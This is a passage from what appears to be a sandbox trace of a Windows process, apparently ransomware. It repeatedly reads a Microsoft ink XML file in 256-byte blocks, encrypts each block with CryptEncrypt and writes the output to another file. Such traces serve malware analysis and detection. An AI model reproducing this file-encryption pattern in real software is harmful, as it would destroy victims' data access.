dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0157.073] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0157.074] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=16616) returned 1 [0157.074] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0157.074] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.076] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.076] GetLastError () returned 0x0 [0157.076] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.078] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.079] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.079] GetLastError () returned 0x0 [0157.079] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.079] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.079] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.079] GetLastError () returned 0x0 [0157.079] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.079] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.079] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.079] GetLastError () returned 0x0 [0157.079] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.079] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.079] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.079] GetLastError () returned 0x0 [0157.079] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.079] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.079] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.079] GetLastError () returned 0x0 [0157.079] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.079] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.079] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.079] GetLastError () returned 0x0 [0157.079] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.080] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.080] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.080] GetLastError () returned 0x0 [0157.080] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.080] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.080] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.080] GetLastError () returned 0x0 [0157.080] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.080] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.080] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.080] GetLastError () returned 0x0 [0157.080] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.080] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.080] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.080] GetLastError () returned 0x0 [0157.080] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.080] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.080] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.080] GetLastError () returned 0x0 [0157.080] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.080] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.080] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.080] GetLastError () returned 0x0 [0157.080] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.080] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.081] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.081] GetLastError () returned 0x0 [0157.081] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.081] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.081] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.081] GetLastError () returned 0x0 [0157.081] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.081] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.081] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.081] GetLastError () returned 0x0 [0157.081] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.081] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.081] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.081] GetLastError () returned 0x0 [0157.081] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.081] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.081] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.081] GetLastError () returned 0x0 [0157.081] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.081] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.081] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.081] GetLastError () returned 0x0 [0157.081] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.081] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.082] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.082] GetLastError () returned 0x0 [0157.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.082] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.082] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.082] GetLastError () returned 0x0 [0157.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.082] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.082] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.082] GetLastError () returned 0x0 [0157.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.082] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.082] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.082] GetLastError () returned 0x0 [0157.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.082] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.082] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.082] GetLastError () returned 0x0 [0157.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.082] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.082] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.082] GetLastError () returned 0x0 [0157.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.082] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.082] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.082] GetLastError () returned 0x0 [0157.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.083] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.083] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.083] GetLastError () returned 0x0 [0157.083] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.083] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.083] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.083] GetLastError () returned 0x0 [0157.083] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.083] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.083] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.083] GetLastError () returned 0x0 [0157.083] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.083] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.083] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.083] GetLastError () returned 0x0 [0157.083] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.083] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.083] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.083] GetLastError () returned 0x0 [0157.083] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 